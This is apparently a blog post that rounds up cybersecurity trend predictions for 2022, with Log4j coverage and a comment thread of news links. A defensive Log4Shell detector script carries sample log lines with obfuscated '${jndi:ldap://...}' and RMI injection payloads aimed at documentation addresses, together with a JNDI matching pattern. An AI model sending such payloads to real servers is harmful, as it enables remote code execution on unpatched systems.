Cyber security trends for 2022

Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends that other people have predicted or reported.

Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.

Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it is a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.

Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development and investment. Advanced 5G and wireless networks will bring higher traffic capacities, lower latency and increased reliability, and will enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored groups and criminal enterprises, are becoming more sophisticated: they search for vulnerabilities and deliver malware by adapting and automating machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, tracked as CVE-2021-44228, was first discovered and reported to Apache by the Alibaba Cloud security team on November 24, 2021. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability, named Log4Shell, to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and the follow-up findings in the same library (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). CVE-2021-42550, also listed in the article, is a related flaw in the separate Logback logging library rather than in Log4j itself.
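
Google’s count of Maven Central packages is really a count of transitive dependencies: a vulnerable `log4j-core` usually arrives through some other library, which is why patching is slow. The Python script below is an added example (not code from Google, Apache or the article) that parses `mvn dependency:tree` output and checks every `log4j-core` it finds against the oldest fixed release of its maintenance branch (2.17.1 for Java 8+, 2.12.4 for the Java 7 branch, 2.3.2 for the Java 6 branch, as per Apache’s advisory for the four CVEs above). The dependency tree in the script is constructed, and the parser is deliberately simplified: it ignores Maven’s parenthesised “omitted for conflict” lines and only looks at `log4j-core`, since `log4j-api` alone is not affected.

```python
import re

LOG4J_CORE = ("org.apache.logging.log4j", "log4j-core")

# Oldest release on each maintenance branch that fixes CVE-2021-44228, -45046,
# -45105 and -44832; anything older on the same branch is still affected.
FIXED_BY_BRANCH = {
    (2, 3): (2, 3, 2),    # Java 6 branch
    (2, 12): (2, 12, 4),  # Java 7 branch
}
FIXED_MAIN = (2, 17, 1)   # Java 8+ branch


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); pre-release tags such as '2.0-beta9' -> (2, 0, 9)."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def log4j_status(version):
    """Fix status of one log4j-core version string."""
    v = parse_version(version)
    if v < (2,):
        return "unsupported 1.x branch (end of life; the 2.x fixes do not apply)"
    fixed = FIXED_BY_BRANCH.get(v[:2], FIXED_MAIN)
    if v >= fixed:
        return "ok"
    return "vulnerable, upgrade to " + ".".join(map(str, fixed))


# "[INFO] |  \- " style prefix that mvn dependency:tree puts before each coordinate
TREE_PREFIX = re.compile(r"^(?:\[INFO\])?\s*[|+\\\-\s]*")


def parse_tree(lines):
    """Yield (group, artifact, version) from mvn dependency:tree output lines."""
    for line in lines:
        coord = TREE_PREFIX.sub("", line).strip().split(":")
        if len(coord) < 4:          # not a group:artifact:type:version[:scope] line
            continue
        # group:artifact:type[:classifier]:version:scope, or the root without a scope
        version = coord[-2] if len(coord) >= 5 else coord[-1]
        yield coord[0], coord[1], version


def find_log4j(lines):
    """Every log4j-core occurrence in the tree, with its fix status."""
    return [(f"{g}:{a}", v, log4j_status(v))
            for g, a, v in parse_tree(lines) if (g, a) == LOG4J_CORE]


# Constructed dependency tree (hypothetical project); the second log4j-core is
# pulled in transitively by a legacy library and would be easy to miss by hand.
SAMPLE_TREE = [
    "[INFO] com.example:app:jar:1.0",
    "[INFO] +- org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.6:compile",
    "[INFO] |  +- org.apache.logging.log4j:log4j-slf4j-impl:jar:2.14.1:compile",
    "[INFO] |  \\- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile",
    "[INFO] +- com.example:legacy-lib:jar:3.2:compile",
    "[INFO] |  \\- org.apache.logging.log4j:log4j-core:jar:2.12.4:compile",
    "[INFO] \\- org.apache.logging.log4j:log4j-api:jar:2.17.1:compile",
]

if __name__ == "__main__":
    for coord, version, status in find_log4j(SAMPLE_TREE):
        print(f"{coord}:{version}  {status}")
```

In a real build, feed it `mvn dependency:tree -Dverbose=true` output per module; the branch lookup matters because a 2.12.x build on Java 7 cannot simply be bumped to 2.17.1.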

Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
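
The “large number of exploit variations” Akamai refers to are mostly obfuscations of the same `${jndi:...}` lookup, which is why naive string matching on `jndi:ldap` misses them. The Python script below is an added example, not code from Akamai or from any article on this page: it unwinds nested Log4j lookups (`${lower:...}`, `${upper:...}`, `${...:-default}`) and URL encoding the way the vulnerable library would evaluate them, then searches the normalized text for the JNDI pattern. The access-log lines and IP addresses are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that itself contains no "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Once the obfuscation is unwound, a live Log4Shell probe reads ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j 2.x would, or leave it alone."""
    body = match.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[6:].lower()
    if head.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${env:NaN:-j} and ${::-j}: the variable is undefined, so the default "j" is used
        return body.split(":-", 1)[1]
    return match.group(0)  # ${jndi:...}, ${user.name} and the like stay as written


def normalize_lookup(text):
    """URL-decode (repeatedly, for double encoding) and unwind nested lookups."""
    decoded = None
    while decoded != text:
        decoded, text = text, unquote(text)
    while True:
        unwound = INNERMOST.sub(_resolve, text)
        if unwound == text:      # no resolvable lookup left
            return text
        text = unwound


def find_jndi(line):
    """Return the JNDI URL schemes (ldap, rmi, dns, ...) found in one log line."""
    return [m.group(1).lower() for m in JNDI.finditer(normalize_lookup(line))]


def scan(lines):
    """(line number, schemes) for every line carrying a Log4Shell probe."""
    hits = []
    for number, line in enumerate(lines, 1):
        schemes = find_jndi(line)
        if schemes:
            hits.append((number, schemes))
    return hits


# Constructed access-log lines (RFC 5737 documentation addresses), not real traffic:
# plain probe in the User-Agent, URL-encoded and case-obfuscated probe in the query
# string, default-value obfuscation, and two benign lines (one with a harmless lookup).
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.11 - - [10/Dec/2021:13:02:12 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.12 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.8/c}"',
    '203.0.113.13 - - [10/Dec/2021:13:02:14 +0000] "GET /docs?q=${user.name} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.14 - - [10/Dec/2021:13:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for number, schemes in scan(SAMPLE_LOG):
        print(f"line {number}: Log4Shell probe via {', '.join(schemes)}")
        print("   ", normalize_lookup(SAMPLE_LOG[number - 1]))
```

The normalizer is the important part: a blocklist of raw strings is trivially bypassed, whereas evaluating the lookups the way Log4j does collapses every variant back to `${jndi:scheme:...}` before the match. A hit only tells you a probe arrived; whether it succeeded still has to be confirmed from outbound LDAP/RMI connections or from the application’s own logs.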

Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.

Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.

In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.

Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1. Malware, 2. Mobile, 3. Machine Learning and AI, 4. Ransomware (because we simply couldn’t not give it a section of its own), and 5. Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Mobile phone security is being reworked (Kännyköiden tietoturva menee uusiksi)
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in a TEE (Trusted Execution Environment), an isolated execution mode of the processor with its own protected memory. The current standard solution for smartphone security is typically built on Arm’s TrustZone technology. The phone’s own security comes from the TEE, and a secure boot usually includes one. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed about 15 years ago).
The memory required by a TEE has not been available in the small microcontrollers used for embedded applications. Manufacturers have promoted secure boot and memory or flash encryption, but these have been fairly weak solutions. Recently, Arm’s TrustZone-M has introduced a new security model for microcontrollers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). In 2015, Intel introduced SGX technology for its PC and server processors; SGX is a set of security extension instructions added to the CPU. In this solution, TEE-type protections are provided by a secure enclave, which needs less code than a traditional TEE structure. An enclave is a temporary structure in the device’s memory: it is created only for the security-sensitive task and is torn down when that task completes. The difference from the TEE structure is significant, because there a second kernel runs all the time alongside the operating system. When there is no parallel kernel, there is one component less to attack.
In Intel’s SGX, enclave memory lives in a limited enclave page cache (EPC), which restricted how much could run inside an enclave. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions) technology, and AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solutions will also come to smartphones. The Armv9-A architecture, introduced in 2021, offers a Realm mode that is very close to the technologies offered on the server side (Intel SGX and TDX). With the coming enclaves, an unlimited number of secured environments will in principle be available.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.

Cyber attacks already threaten goods deliveries too (Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin)
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime, extending it from technically savvy individuals and criminal organizations to everyone. The new “Everything as a Service” model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf

Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again (Jarno Limnéll varoittaa “kyberpandemiasta”: internetin häiriö voi panna maailman taas sekaisin)
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams, and scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”

Cyber attacks are accelerating, but companies can respond to them (Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin)
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown considerably. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Trend Micro’s recommendations are:
• Enhanced server security and application management policies to combat extortion (ransomware)
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Extended Detection and Response (XDR) to detect attacks across large networks

Trend Micro report: in the future, everything is at risk (Trend Micron raportti: tulevaisuudessa kaikki on vaarassa)
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.

3,062 Comments

  1. Tomi Engdahl says:

    TikTok Was Designed for War
    As Russia’s invasion of Ukraine plays out online, the platform’s design and algorithm prove ideal for the messiness of war—but a nightmare for the truth.
    https://www.wired.com/story/ukraine-russia-war-tiktok/#intcid=_wired-bottom-recirc_8e802014-a05f-48c5-89e8-9dad931361ad_text2vec1-reranked-by-vidi

  2. Tomi Engdahl says:

    Russia’s War in Ukraine Could Spur Another Global Chip Shortage
    Ukraine is home to half of the world’s neon gas, which is critical for manufacturing semiconductor chips.
    https://www.wired.com/story/ukraine-chip-shortage-neon/#intcid=_wired-bottom-recirc_8e802014-a05f-48c5-89e8-9dad931361ad_text2vec1-reranked-by-vidi

    On Thursday morning, explosions rocked at least seven cities in Ukraine, heralding the start of a full-scale Russian invasion. Among Putin’s first targets was Odesa, a seaside city huddled around the Black Sea, and one of the country’s busiest ports. But it is also home to a little-known company called Cryoin, which plays a big role in the global production of semiconductors.

    Cryoin makes neon gas, a substance used to power the lasers that etch patterns into computer chips. It supplies companies in Europe, Japan, Korea, China, and Taiwan, but most of its neon is shipped to the US, the company told WIRED. Now analysts are warning that the ripple effects caused by disruption to Cryoin’s supply could be felt around the world.

    Cryoin’s production of neon and other gases ground to a halt on Thursday as the invasion began, says business development director Larissa Bondarenko. “We decided that [our employees] should stay at home for the next couple of days until the situation is clearer, to make sure that everyone is safe,” she says, adding there was no damage to the facility as of Monday. Despite plans to restart production over the weekend, missiles over Odesa meant it was still too dangerous. Bondarenko, who lives half an hour away from the site by car, says she has been sleeping in her basement. “Thank God we have one in our house.”

    But Russian aggression in Ukraine is making the industry nervous that these shortages could be intensified by a repeat of 2014, when prices for neon gas spiked by 600 per cent in response to the annexation of Crimea. Last week, US and Japanese governments were scrambling to make sure that will not happen again, pressuring their chip industries to find alternative sources of this obscure gas before it’s too late.

    Ukraine is just one of a series of choke points in the global semiconductor industry. Around half of the world’s neon gas comes from the country, TechCet, an electronic materials advisory firm which advises some of the world’s biggest chipmakers including Intel and Samsung, told WIRED.

    Ukraine’s neon industry was built to take advantage of the gases produced as byproducts of Russian steel manufacturing. “What happens in Russia is that those [steel] companies that have the facility to capture the gas will bottle it and sell it as crude,” says Lita Shon-Roy, president and CEO of TechCet. “Then someone has to purify it and take out the other [gases] and that’s where Cryoin comes in.”

  3. Tomi Engdahl says:

    Slight Increase in Attacks on ICS Computers in 2021: Report
    https://www.securityweek.com/slight-increase-attacks-ics-computers-2021-report

    Kaspersky said it saw only a small increase in the percentage of industrial control system (ICS) computers targeted in 2021 compared to the previous year, but there was a more significant rise for certain types of threats.

    Overall, Kaspersky blocked “malicious objects” on 39.6% of the ICS computers protected by its products, up from 38.6% in 2020. On the other hand, in the second half of 2021, the company observed attacks only against 31.4% of devices, the smallest of any six-month period since the start of 2020.

    However, there were certain types of threats where the number of detections has been on an upwards trend in the past two years. This includes spyware (blocked on over 8.1% of devices compared to 5.6% in H1 2020), malicious scripts and phishing pages (9.3% up from 6.5%), and cryptocurrency miners (2.1% up from 0.9%).

    In North America, nearly 20% of systems were targeted, roughly the same as in Western Europe, Kaspersky’s report shows. In comparison, the percentage of targeted systems exceeded 40% in many parts of Asia and even 50% in Africa and Southeast Asia.

    The cybersecurity firm’s solutions blocked roughly 5,000 malware families and 20,000 malware variants on industrial systems in both the first and the second half of 2021. In terms of variants, this is roughly the same as in the previous two years. However, in terms of malware families, while there was no significant change in 2021 compared to 2020, the numbers are roughly double compared to 2019.

  4. Tomi Engdahl says:

    Tens of Cybersecurity Firms Found Exposing Their Assets: Study
    https://www.securityweek.com/tens-cybersecurity-firms-found-exposing-their-assets-study

    Tens of cybersecurity companies expose a large number of assets to the internet, according to a study conducted recently by attack surface management firm Reposify.

    It’s not uncommon for major companies to unwittingly expose databases and other assets, but a study conducted by Reposify over a two-week period in January showed that 35 multinational cybersecurity companies and their more than 350 subsidiaries hosted over 200,000 exposed assets. These assets included databases, remote access sites, and cloud services.

    Reposify’s analysis showed that 86% of these companies have at least one exposed remote access service, 80% expose network assets, and 63% expose back office internal networks. Just over half of the cybersecurity firms have at least one exposed database.

    In a vast majority of cases, companies exposed platforms such as Nginx, Apache, OpenSSH, IIS and Portmap, which are “highly sensitive, and the consequence of a breach is severe — particularly in the case of the cybersecurity industry.”

    As for exposed remote access protocols, 90% of companies exposed OpenSSH, followed by RDP (47%), Telnet (33%), and SMB (30%).

    The study showed that more than two-thirds of companies exposed PostgreSQL databases, and half exposed Oracledb databases.

    Many cybersecurity firms and their subsidiaries also appear to expose storage and backup systems (FTP, S3), and development tools (Express, Jenkins, Tableau Server).

    Nearly every cybersecurity company seems to host exposed assets on the AWS cloud platform (97%), followed by Azure (82%) and Google Cloud (76%).

    One concerning finding is that — except for storage and web assets — a majority of exposed services are in the organization’s “unofficial perimeter,” which means they are less likely to be monitored.

    “Services under unknown perimeters are less likely to be known, and often represent shadow IT, unknown risks, or flag a possible backdoor malactors can use to access a company’s assets,” Reposify said in its report.

    https://go.reposify.com/hubfs/Reposify_Cybersecurity_Report_2022.pdf

  5. Tomi Engdahl says:

    CISA’s Zero Trust Guidance for Enterprise Mobility Available for Public Comment
    https://www.cisa.gov/uscert/ncas/current-activity/2022/03/07/cisas-zero-trust-guidance-enterprise-mobility-available-public
    CISA has released a draft version of Applying Zero Trust Principles to Enterprise Mobility for public comment. The paper guides federal agencies as they evolve and operationalize cybersecurity programs and capabilities, including cybersecurity for mobility. The public comment period will close April 18, 2022. Executive Order 14028: Improving the Nation’s Cybersecurity, issued May 12, 2021, requires Federal Civilian Executive Branch departments and agencies to adopt Zero Trust (ZT) architectures to protect the government’s information resources, of which federal mobility is an integral part.

  6. Tomi Engdahl says:

    U.S. Security Vendors Launch Critical Infrastructure Defense Project
    https://www.securityweek.com/us-security-vendors-launch-critical-infrastructure-defense-project

    Amid rising Russia tensions, Cloudflare, CrowdStrike and Ping Identity offer free security for Critical National Infrastructure operators

    Government warnings of heightened cyber risk to U.S. organizations as a by-product of the war in Ukraine are almost a daily occurrence. The government considers increased cyber activity aimed at U.S. and NATO organizations ‒ and particularly critical infrastructure organizations ‒ to be a serious threat.

    CISA has a ‘Shields Up’ page that states, “While there are no specific or credible cyber threats to the U.S. homeland at this time, Russia’s unprovoked attack on Ukraine, which has involved cyber-attacks on Ukrainian government and critical infrastructure organizations, may impact organizations both within and beyond the region. Every organization—large and small—must be prepared to respond to disruptive cyber activity.”

    You can see SecurityWeek’s take on how and why cyber threats could escalate from Ukraine into a formal or informal cyberwar here: Russia-Ukraine: Threat of Local Cyber Operations Escalating Into Global Cyberwar. Failing the rapid withdrawal of Russian troops from Ukraine, which doesn’t seem likely, it is difficult to see anything other than increased cyber activity aimed against the U.S. and its allies.

    Reply
  7. Tomi Engdahl says:

    Jamie Crawley / CoinDesk:
    The EU Parliament will vote on crypto rules on March 14, after the removal of wording that would have banned proof-of-work cryptocurrencies over energy concerns

    EU Parliament Monetary Committee to Vote on MiCA Next Week
    Wording that would have banned proof-of-work cryptos like bitcoin has been removed.
    https://www.coindesk.com/policy/2022/03/07/eu-parliament-monetary-committee-to-vote-on-mica-next-week/

    After having previously been postponed thanks to an outcry over language amounting to a “de facto” ban on Bitcoin, a vote by the Monetary Committee of the European Union’s parliament on the EU’s Markets in Crypto Assets (MiCA) legislation will take place on March 14.

    The news was tweeted out minutes ago by Dr. Stefan Berger, the member of parliament in charge of shepherding MiCA through parliament.
    “An independent topic of proof-of-work is no longer provided in the MiCA,” Berger told CoinDesk, confirming his promise to remove language he had previously called a “de facto” ban on Bitcoin.
    “My suggestion is to include crypto assets, like all other financial products, in the taxonomy area,” Berger today added. “In view of the controversial discussions surrounding the energy consumption of crypto assets, the taxonomy could provide clarity and ensure a better information basis for consumers.”
    “Strong support for MiCA is a strong signal from the EU Parliament for a technology-neutral and innovation-friendly financial sector,” he concluded.

    The Case for Taxing Proof-of-Work
    https://www.coindesk.com/layer2/taxweek/2022/02/24/the-case-for-taxing-proof-of-work/

    Most bitcoin owners aren’t cypherpunks and don’t require an energy-intensive consensus mechanism. A tax would shift them on to sensible alternatives. This post is part of CoinDesk’s Tax Week.

    Reply
